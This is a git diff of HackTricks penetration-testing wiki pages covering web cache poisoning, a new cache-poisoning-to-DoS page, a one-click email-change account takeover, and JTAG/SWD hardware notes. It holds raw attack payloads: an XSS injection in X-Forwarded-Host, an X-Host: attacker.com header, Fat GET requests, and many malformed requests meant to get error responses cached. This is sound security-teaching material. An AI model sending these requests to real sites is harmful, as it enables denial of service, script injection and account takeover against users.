- The status code is changed to `200 OK`.
|
* The status code is changed to `200 OK`.
|
||||||
- The response body is modified to `{"success":true}` or an empty object `{}`.
|
* The response body is modified to `{"success":true}` or an empty object `{}`.
|
||||||
|
|
||||||
These manipulation techniques are effective in scenarios where JSON is utilized for data transmission and receipt.
|
These manipulation techniques are effective in scenarios where JSON is utilized for data transmission and receipt.
|
||||||
|
|
||||||
|
## Change email of current session
|
||||||
|
|
||||||
|
From [this report](https://dynnyd20.medium.com/one-click-account-take-over-e500929656ea):
|
||||||
|
|
||||||
|
* Attacker requests to change his email with a new one
|
||||||
|
* Attacker receives a link to confirm the change of the email
|
||||||
|
* Attacker send the victim the link so he clicks it
|
||||||
|
* The victims email is changed to the one indicated by the attacker
|
||||||
|
* The attack can recover the password and take over the account
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [https://infosecwriteups.com/firing-8-account-takeover-methods-77e892099050](https://infosecwriteups.com/firing-8-account-takeover-methods-77e892099050)
|
* [https://infosecwriteups.com/firing-8-account-takeover-methods-77e892099050](https://infosecwriteups.com/firing-8-account-takeover-methods-77e892099050)
|
||||||
|
* [https://dynnyd20.medium.com/one-click-account-take-over-e500929656ea](https://dynnyd20.medium.com/one-click-account-take-over-e500929656ea)
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
@ -117,7 +126,7 @@ Other ways to support HackTricks:
|
||||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
\
|
\
|
||||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||||
|
@ -41,13 +41,19 @@ The execution of a cache poisoning assault involves several steps:
|
||||||
|
|
||||||
### Discovery: Check HTTP headers
|
### Discovery: Check HTTP headers
|
||||||
|
|
||||||
Usually, when a response was **stored in the cache** there will be a **header indicating so**, you can check which headers you should pay attention to in this post: [**HTTP Cache headers**](../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers).
|
Usually, when a response was **stored in the cache** there will be a **header indicating so**, you can check which headers you should pay attention to in this post: [**HTTP Cache headers**](../../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers).
|
||||||
|
|
||||||
### Discovery: Caching 400 code
|
### Discovery: Caching error codes 
|
||||||
|
|
||||||
If you are thinking that the response is being stored in a cache, you could try to **send requests with a bad header**, which should be responded to with a **status code 400**. Then try to access the request normally and if the **response is a 400 status code**, you know it's vulnerable (and you could even perform a DoS).\
|
If you are thinking that the response is being stored in a cache, you could try to **send requests with a bad header**, which should be responded to with a **status code 400**. Then try to access the request normally and if the **response is a 400 status code**, you know it's vulnerable (and you could even perform a DoS).
|
||||||
A badly configured header could be just `\:` as a header.\
|
|
||||||
_Note that sometimes these kinds of status codes aren't cached so this test will be useless._
|
You can find more options in:
|
||||||
|
|
||||||
|
{% content-ref url="cache-poisoning-to-dos.md" %}
|
||||||
|
[cache-poisoning-to-dos.md](cache-poisoning-to-dos.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
However, note that **sometimes these kinds of status codes aren't cached** so this test could not be reliable.
|
||||||
|
|
||||||
### Discovery: Identify and evaluate unkeyed inputs
|
### Discovery: Identify and evaluate unkeyed inputs
|
||||||
|
|
||||||
|
@ -86,6 +92,12 @@ X-Forwarded-Host: a."><script>alert(1)</script>"
|
||||||
|
|
||||||
_Note that this will poison a request to `/en?region=uk` not to `/en`_
|
_Note that this will poison a request to `/en?region=uk` not to `/en`_
|
||||||
|
|
||||||
|
### Cache poisoning to DoS
|
||||||
|
|
||||||
|
{% content-ref url="cache-poisoning-to-dos.md" %}
|
||||||
|
[cache-poisoning-to-dos.md](cache-poisoning-to-dos.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
### Using web cache poisoning to exploit cookie-handling vulnerabilities
|
### Using web cache poisoning to exploit cookie-handling vulnerabilities
|
||||||
|
|
||||||
Cookies could also be reflected on the response of a page. If you can abuse it to cause an XSS for example, you could be able to exploit XSS in several clients that load the malicious cache response.
|
Cookies could also be reflected on the response of a page. If you can abuse it to cause an XSS for example, you could be able to exploit XSS in several clients that load the malicious cache response.
|
||||||
|
@ -124,9 +136,30 @@ User-Agent: THE SPECIAL USER-AGENT OF THE VICTIM
|
||||||
X-Host: attacker.com
|
X-Host: attacker.com
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Fat Get
|
||||||
|
|
||||||
|
Send a GET request with the request in the URL and in the body. If the web server uses the one from the body but the cache server caches the one from the URL, anyone accessing that URL will actually use the parameter from the body. Like the vuln James Kettle found at the Github website:
|
||||||
|
|
||||||
|
```
|
||||||
|
GET /contact/report-abuse?report=albinowax HTTP/1.1
|
||||||
|
Host: github.com
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 22
|
||||||
|
|
||||||
|
report=innocent-victim
|
||||||
|
```
|
||||||
|
|
||||||
|
There it a portswigger lab about this: [https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get)
|
||||||
|
|
||||||
|
### Parameter Cloacking
|
||||||
|
|
||||||
|
For example it's possible to separate **parameters** in ruby servers using the char **`;`** instead of **`&`**. This could be used to put unkeyed parameters values inside keyed ones and abuse them.
|
||||||
|
|
||||||
|
Portswigger lab: [https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking)
|
||||||
|
|
||||||
### Exploiting HTTP Cache Poisoning by abusing HTTP Request Smuggling
|
### Exploiting HTTP Cache Poisoning by abusing HTTP Request Smuggling
|
||||||
|
|
||||||
Learn here about how to perform [Cache Poisoning attacks by abusing HTTP Request Smuggling](http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-poisoning).
|
Learn here about how to perform [Cache Poisoning attacks by abusing HTTP Request Smuggling](../http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-poisoning).
|
||||||
|
|
||||||
### Automated testing for Web Cache Poisoning
|
### Automated testing for Web Cache Poisoning
|
||||||
|
|
||||||
|
@ -134,7 +167,9 @@ The [Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vul
|
||||||
|
|
||||||
Example usage: `wcvs -u example.com`
|
Example usage: `wcvs -u example.com`
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
|
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
\
|
\
|
||||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||||
|
@ -142,6 +177,8 @@ Get Access Today:
|
||||||
|
|
||||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
## Vulnerable Examples
|
## Vulnerable Examples
|
||||||
|
|
||||||
### Apache Traffic Server ([CVE-2021-27577](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27577))
|
### Apache Traffic Server ([CVE-2021-27577](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27577))
|
||||||
|
@ -201,7 +238,7 @@ Then, the **attacker** can access _http://www.example.com/home.php/non-existent.
|
||||||
|
|
||||||
Note that the **cache proxy** should be **configured** to **cache** files **based** on the **extension** of the file (_.css_) and not base on the content-type. In the example _http://www.example.com/home.php/non-existent.css_ will have a `text/html` content-type instead of a `text/css` mime type (which is the expected for a _.css_ file).
|
Note that the **cache proxy** should be **configured** to **cache** files **based** on the **extension** of the file (_.css_) and not base on the content-type. In the example _http://www.example.com/home.php/non-existent.css_ will have a `text/html` content-type instead of a `text/css` mime type (which is the expected for a _.css_ file).
|
||||||
|
|
||||||
Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request Smuggling](http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-deception).
|
Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request Smuggling](../http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-deception).
|
||||||
|
|
||||||
## Automatic Tools
|
## Automatic Tools
|
||||||
|
|
||||||
|
@ -216,7 +253,7 @@ Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request S
|
||||||
* [https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9)
|
* [https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9)
|
||||||
* [https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/](https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/)
|
* [https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/](https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/)
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
\
|
\
|
||||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
172
pentesting-web/cache-deception/cache-poisoning-to-dos.md
Normal file
|
@ -0,0 +1,172 @@
|
||||||
|
# Cache Poisoning to DoS
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
{% hint style="danger" %}
|
||||||
|
In this page you can find different variations to try to make the **web server respond with errors** to requests that are **valid for the cache servers**
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
|
* **HTTP Header Oversize (HHO)**
|
||||||
|
|
||||||
|
Send a request with a header size larger than the one supported by the web server but smaller than the one supported by the cache server. The web server will respond with a 400 response which might be cached:
|
||||||
|
|
||||||
|
```
|
||||||
|
GET / HTTP/1.1
|
||||||
|
Host: redacted.com
|
||||||
|
X-Oversize-Hedear:Big-Value-000000000000000
|
||||||
|
```
|
||||||
|
|
||||||
|
* **HTTP Meta Character (HMC) & Unexpected values**
|
||||||
|
|
||||||
|
Send a header that contain some **harmfull meta characters** such as `\n` and `\r`. In order the attack to work you must bypass the cache first.
|
||||||
|
|
||||||
|
```
|
||||||
|
GET / HTTP/1.1
|
||||||
|
Host: redacted.com
|
||||||
|
X-Meta-Hedear:Bad Chars\n \r
|
||||||
|
```
|
||||||
|
|
||||||
|
A badly configured header could be just `\:` as a header.
|
||||||
|
|
||||||
|
This could also work if unexpected values are sent, like an unexpected Content-Type:
|
||||||
|
|
||||||
|
```
|
||||||
|
GET /anas/repos HTTP/2
|
||||||
|
Host: redacted.com
|
||||||
|
Content-Type: HelloWorld
|
||||||
|
```
|
||||||
|
|
||||||
|
* **Unkeyed header**
|
||||||
|
|
||||||
|
Some websites will return an error status code if they **see some specific headers i**n the request like with the _X-Amz-Website-Location-Redirect: someThing_ header:
|
||||||
|
|
||||||
|
```
|
||||||
|
GET /app.js HTTP/2
|
||||||
|
Host: redacted.com
|
||||||
|
X-Amz-Website-Location-Redirect: someThing
|
||||||
|
|
||||||
|
HTTP/2 403 Forbidden
|
||||||
|
Cache: hit
|
||||||
|
|
||||||
|
Invalid Header
|
||||||
|
```
|
||||||
|
|
||||||
|
* **HTTP Method Override Attack (HMO)**
|
||||||
|
|
||||||
|
If the server supports changing the HTTP method with headers such as `X-HTTP-Method-Override`, `X-HTTP-Method` or `X-Method-Override`. It's possible to request a valid page changing the method so the server doesn't supports it so a bad response gets cached:
|
||||||
|
|
||||||
|
```
|
||||||
|
GET /blogs HTTP/1.1
|
||||||
|
Host: redacted.com
|
||||||
|
HTTP-Method-Override: POST
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
* **Unkeyed Port**
|
||||||
|
|
||||||
|
If port in the Host header is reflected in the response and not included in the cache key, it's possible to redirect it to an unused port:
|
||||||
|
|
||||||
|
```
|
||||||
|
GET /index.html HTTP/1.1
|
||||||
|
Host: redacted.com:1
|
||||||
|
|
||||||
|
HTTP/1.1 301 Moved Permanently
|
||||||
|
Location: https://redacted.com:1/en/index.html
|
||||||
|
Cache: miss
|
||||||
|
```
|
||||||
|
|
||||||
|
* **Long Redirect DoS**
|
||||||
|
|
||||||
|
Like in the following example, x is not being cached, so an attacker could abuse the redirect response behaviour to make the redirect send a URL so big that it returns an error. Then, people trying to access the URL without the uncached x key will get the error response:
|
||||||
|
|
||||||
|
```
|
||||||
|
GET /login?x=veryLongUrl HTTP/1.1
|
||||||
|
Host: www.cloudflare.com
|
||||||
|
|
||||||
|
HTTP/1.1 301 Moved Permanently
|
||||||
|
Location: /login/?x=veryLongUrl
|
||||||
|
Cache: hit
|
||||||
|
|
||||||
|
GET /login/?x=veryLongUrl HTTP/1.1
|
||||||
|
Host: www.cloudflare.com
|
||||||
|
|
||||||
|
HTTP/1.1 414 Request-URI Too Large
|
||||||
|
CF-Cache-Status: miss
|
||||||
|
```
|
||||||
|
|
||||||
|
* **Host header case normalization**
|
||||||
|
|
||||||
|
The host header should be case insensitive but some websites expect it to be lowercase returning an error if it's not:
|
||||||
|
|
||||||
|
```
|
||||||
|
GET /img.png HTTP/1.1
|
||||||
|
Host: Cdn.redacted.com
|
||||||
|
|
||||||
|
HTTP/1.1 404 Not Found
|
||||||
|
Cache:miss
|
||||||
|
|
||||||
|
Not Found
|
||||||
|
```
|
||||||
|
|
||||||
|
* **Path normalization**
|
||||||
|
|
||||||
|
Some pages will return error codes sending data URLencode in the path, however, the cache server with URLdecode the path and store the response for the URLdecoded path:
|
||||||
|
|
||||||
|
```
|
||||||
|
GET /api/v1%2e1/user HTTP/1.1
|
||||||
|
Host: redacted.com
|
||||||
|
|
||||||
|
|
||||||
|
HTTP/1.1 404 Not Found
|
||||||
|
Cach:miss
|
||||||
|
|
||||||
|
Not Found
|
||||||
|
```
|
||||||
|
|
||||||
|
* **Fat Get**
|
||||||
|
|
||||||
|
Some cache servers, like Cloudflare, or web servers, stops GET requests with a body, so this oucld be abused to cache a invalid response:
|
||||||
|
|
||||||
|
```
|
||||||
|
GET /index.html HTTP/2
|
||||||
|
Host: redacted.com
|
||||||
|
Content-Length: 3
|
||||||
|
|
||||||
|
xyz
|
||||||
|
|
||||||
|
|
||||||
|
HTTP/2 403 Forbidden
|
||||||
|
Cache: hit
|
||||||
|
```
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [https://anasbetis023.medium.com/dont-trust-the-cache-exposing-web-cache-poisoning-and-deception-vulnerabilities-3a829f221f52](https://anasbetis023.medium.com/dont-trust-the-cache-exposing-web-cache-poisoning-and-deception-vulnerabilities-3a829f221f52)
|
||||||
|
* [https://youst.in/posts/cache-poisoning-at-scale/?source=post\_page-----3a829f221f52--------------------------------](https://youst.in/posts/cache-poisoning-at-scale/?source=post\_page-----3a829f221f52--------------------------------)
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
|
@ -23,7 +23,7 @@ Nowadays **web** **applications** usually **uses** some kind of **intermediary**
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
* [ ] [**Abusing hop-by-hop headers**](abusing-hop-by-hop-headers.md)
|
* [ ] [**Abusing hop-by-hop headers**](abusing-hop-by-hop-headers.md)
|
||||||
* [ ] [**Cache Poisoning/Cache Deception**](cache-deception.md)
|
* [ ] [**Cache Poisoning/Cache Deception**](cache-deception/)
|
||||||
* [ ] [**HTTP Request Smuggling**](http-request-smuggling/)
|
* [ ] [**HTTP Request Smuggling**](http-request-smuggling/)
|
||||||
* [ ] [**H2C Smuggling**](h2c-smuggling.md)
|
* [ ] [**H2C Smuggling**](h2c-smuggling.md)
|
||||||
* [ ] [**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md)
|
* [ ] [**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md)
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
|
# Hardware Hacking
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
@ -9,15 +9,12 @@ Other ways to support HackTricks:
|
||||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## JTAG
|
||||||
#
|
|
||||||
|
|
||||||
# JTAG
|
|
||||||
|
|
||||||
JTAG allows to perform a boundary scan. The boundary scan analyzes certain circuitry, including embedded boundary-scan cells and registers for each pin.
|
JTAG allows to perform a boundary scan. The boundary scan analyzes certain circuitry, including embedded boundary-scan cells and registers for each pin.
|
||||||
|
|
||||||
|
@ -34,7 +31,7 @@ It can also support other commands such as:
|
||||||
|
|
||||||
You might come across these instructions when you use a tool like the JTAGulator.
|
You might come across these instructions when you use a tool like the JTAGulator.
|
||||||
|
|
||||||
## The Test Access Port
|
### The Test Access Port
|
||||||
|
|
||||||
Boundary scans include tests of the four-wire **Test Access Port (TAP)**, a general-purpose port that provides **access to the JTAG test support** functions built into a component. TAP uses the following five signals:
|
Boundary scans include tests of the four-wire **Test Access Port (TAP)**, a general-purpose port that provides **access to the JTAG test support** functions built into a component. TAP uses the following five signals:
|
||||||
|
|
||||||
|
@ -46,25 +43,24 @@ Boundary scans include tests of the four-wire **Test Access Port (TAP)**, a gene
|
||||||
|
|
||||||
Sometimes you will be able to find those pins marked in the PCB. In other occasions you might need to **find them**.
|
Sometimes you will be able to find those pins marked in the PCB. In other occasions you might need to **find them**.
|
||||||
|
|
||||||
## Identifying JTAG pins
|
### Identifying JTAG pins
|
||||||
|
|
||||||
The fastest but most expensive way to detect JTAG ports is by using the **JTAGulator**, a device created specifically for this purpose (although it can **also detect UART pinouts**).
|
The fastest but most expensive way to detect JTAG ports is by using the **JTAGulator**, a device created specifically for this purpose (although it can **also detect UART pinouts**).
|
||||||
|
|
||||||
It has **24 channels** you can connect to the boards pins. Then it performs a **BF attack** of all the possible combinations sending **IDCODE** and **BYPASS** boundary scan commands. If it receives a response, it displays the channel corresponding to each JTAG signal
|
It has **24 channels** you can connect to the boards pins. Then it performs a **BF attack** of all the possible combinations sending **IDCODE** and **BYPASS** boundary scan commands. If it receives a response, it displays the channel corresponding to each JTAG signal
|
||||||
|
|
||||||
A cheaper but much slower way of identifying JTAG pinouts is by using the [**JTAGenum**](https://github.com/cyphunk/JTAGenum/) loaded on an Arduino-compatible microcontroller.
|
A cheaper but much slower way of identifying JTAG pinouts is by using the [**JTAGenum**](https://github.com/cyphunk/JTAGenum/) loaded on an Arduino-compatible microcontroller.
|
||||||
|
|
||||||
Using **JTAGenum**, you’d first **define the pins of the probing** device that you’ll use for the enumeration.You’d have to reference the device’s pinout diagram, and then connect these pins with the test points on your target device.
|
Using **JTAGenum**, you’d first **define the pins of the probing** device that you’ll use for the enumeration.You’d have to reference the device’s pinout diagram, and then connect these pins with the test points on your target device.
|
||||||
|
|
||||||
A **third way** to identify JTAG pins is by **inspecting the PCB** for one of the pinouts. In some cases, PCBs might conveniently provide the **Tag-Connect interface**, which is a clear indication that the board has a JTAG connector, too. You can see what that interface looks like at [https://www.tag-connect.com/info/](https://www.tag-connect.com/info/). Additionally, inspecting the **datasheets of the chipsets on the PCB** might reveal pinout diagrams that point to JTAG interfaces.
|
A **third way** to identify JTAG pins is by **inspecting the PCB** for one of the pinouts. In some cases, PCBs might conveniently provide the **Tag-Connect interface**, which is a clear indication that the board has a JTAG connector, too. You can see what that interface looks like at [https://www.tag-connect.com/info/](https://www.tag-connect.com/info/). Additionally, inspecting the **datasheets of the chipsets on the PCB** might reveal pinout diagrams that point to JTAG interfaces.
|
||||||
|
|
||||||
# SDW
|
## SDW
|
||||||
|
|
||||||
SWD is an ARM-specific protocol designed for debugging.
|
SWD is an ARM-specific protocol designed for debugging.
|
||||||
|
|
||||||
The SWD interface requires **two pins**: a bidirectional **SWDIO** signal, which is the equivalent of JTAG’s **TDI and TDO pins and a clock**, and **SWCLK**, which is the equivalent of **TCK** in JTAG. Many devices support the **Serial Wire or JTAG Debug Port (SWJ-DP)**, a combined JTAG and SWD interface that enables you to connect either a SWD or JTAG probe to the target.
|
The SWD interface requires **two pins**: a bidirectional **SWDIO** signal, which is the equivalent of JTAG’s **TDI and TDO pins and a clock**, and **SWCLK**, which is the equivalent of **TCK** in JTAG. Many devices support the **Serial Wire or JTAG Debug Port (SWJ-DP)**, a combined JTAG and SWD interface that enables you to connect either a SWD or JTAG probe to the target.
|
||||||
|
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
@ -74,9 +70,7 @@ Other ways to support HackTricks:
|
||||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -165,6 +165,32 @@ AAA Hi Dreg! AAA
|
||||||
